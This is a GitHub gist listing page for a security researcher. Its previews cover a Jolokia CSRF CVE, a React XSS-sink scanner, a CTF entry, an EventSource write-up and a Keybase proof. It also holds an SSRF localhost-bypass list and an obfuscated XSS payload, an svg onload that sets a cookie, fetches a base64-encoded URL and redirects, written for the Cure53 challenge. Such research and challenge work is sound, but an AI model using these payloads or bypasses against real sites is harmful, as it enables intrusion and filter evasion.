Skip to content

Instantly share code, notes, and snippets.

View typed.js
bayotop /
Created Jul 3, 2019
CVE-2018-10899: CSRF in Jolokia 1.6.0


Jolokia 1.6.0 is vulnerable to CSRF. This holds true for properly configured instances with strict checking for origin and referrer headers. The issue was fixed in version 1.6.1.

Red Hat Security Advisory:


In version 1.2.1 Jolokia introduced a <strict-checking/> option within the Cross-Origin Resource Sharing policy defined in jolokia-access.xml to prevent CSRF (4.1.5).

bayotop /
Last active Jun 27, 2019
Programmatic authentication to GCP's Identiy-Aware Proxy
import json
import time
from jwt import JWT, jwk_from_pem
import requests
jwt = JWT()
bayotop /
Last active Dec 4, 2018
Identify "href" (i.e., free "javascript:" XSS) and dangerouslySetInnerHtml usages in ReactJS SPAs.
import re
import sys
VULNERABLE_HREF = r'href: [^"].+[^\s]?'
DANGEROUSLY_SET_INNER_HTML = r'__html: .+[^\s]?'
STATE_VALUES = r'\.setState\({([\s\S]*?)}\)'
#false_positives = ("", "constants.")
def find_state_candidates(name, states):
bayotop /
Created Jun 20, 2018
h1-702 CTF 2018 - Web 1
bayotop / bypasses.txt
Last active Apr 19, 2020
Various useful bypasses
View bypasses.txt
# SSRF localhost (@omespino)
http://[::]/ # ipv6
http://0/ # dns to
http://2130706433/ # decimal
http://0x7f000001/ # hex
http://0x7f.0x00.0x00.0x01 # hex
http://0177.0.0.01 # octal
bayotop /
Last active May 30, 2018
Cure53 - Chinese New Year Challenge 2018

Works in latest Firefox 58.0.2 (Windows 10, 64-bit) (copy-paste into browser to preserve URL encoding):<svg onload="document.cookie=`user=onerror%253dalert%253bthrow document.scripts[0].attributes[0].value%252f%252f;`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hRZ2FXUTlkMlZzWTI5dFpVMXpaejQ4TDNOamNtbHdkRDRtZEc5clpXNDk=`))%2bt})">&key=.element.innerHTML

When pasting into, the above has to be URL decoded once:<svg onload="document.cookie=`user=onerror%3dalert%3bthrow document.scripts[0].attributes[0].value%2f%2f;`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hR
bayotop /
Created Jan 15, 2018 GH Verification

Keybase proof

I hereby claim:

  • I am bayotop on github.
  • I am bayotop ( on keybase.
  • I have a public key whose fingerprint is 38D3 3EC0 5654 05BC 3C76 686F C090 53E7 6BFB A3FD

To claim this, I am signing this object:

bayotop /
Last active May 25, 2019
Sending arbitrary Last-Event-ID header values across origins using the EventSource API.

The EventSource API

The EventSource interface is used to receive server-sent events. It connects to a server over HTTP and receives events in text/event-stream format without closing the connection.


Setting an ID lets the browser keep track of the last event fired so that if, the connection to the server is dropped, a special HTTP header (Last-Event-ID) is set with the new request.



How I found the flag

I ran an obligatory port scan, checked the IP using, and did some basic directory discovery. I found two open ports - 22 and 80 - and one directory /flag with a message from the creators.

As this wasn't really helpful, I tried to enumerate vhosts and found one resulting in a different response:

You can’t perform that action at this time.